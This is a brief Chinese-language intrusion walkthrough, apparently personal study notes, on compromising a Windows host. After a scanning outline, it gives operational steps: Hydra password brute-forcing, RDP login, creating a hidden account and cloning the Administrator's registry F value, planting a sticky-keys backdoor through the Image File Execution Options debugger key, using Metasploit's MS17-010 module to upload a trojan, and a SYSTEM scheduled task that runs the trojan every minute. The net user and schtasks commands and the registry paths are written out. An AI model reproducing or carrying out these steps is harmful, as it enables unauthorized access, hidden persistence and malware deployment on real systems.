-
一、黑盒渗透三件套
-
1. 扫IP
2. 扫端口
3. 扫目录
二、入侵
1. Hydra爆破
得到Administrator的密码为Admin@123!
2. rdesktop远程桌面
登入账号Administrator密码Admin@123!
3. 创建隐藏用户
3.1创建用户
win+R cmd打开命令行
net user 【用户名】$ 【密码】 /add -------用户名krroot 密码asdfghjkl123!------
3.2隐藏用户
win+R regedit打开注册表
找到路径HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
将krroot的F键值改为与Administrator一样的F键值
导出krroot的两个注册表数据文件到桌面,然后删除这两项
重新导入数据
4. 留后门(shift粘滞键)
在注册表中找到路径HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption
里面新建一个项sethc.exe,在里面新建一个字符串值debugger,数值设为cmd.exe的路径
5. 上传木马
永恒之蓝
进入msfconsole模块
search ms17-010
use2
设置攻击端口为192.168.85.129
上传木马
6. 创建计划任务
schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\wkbd\javs.exe /ru system /f
#创建一个system计划任务,每一分钟执行一次javs.exe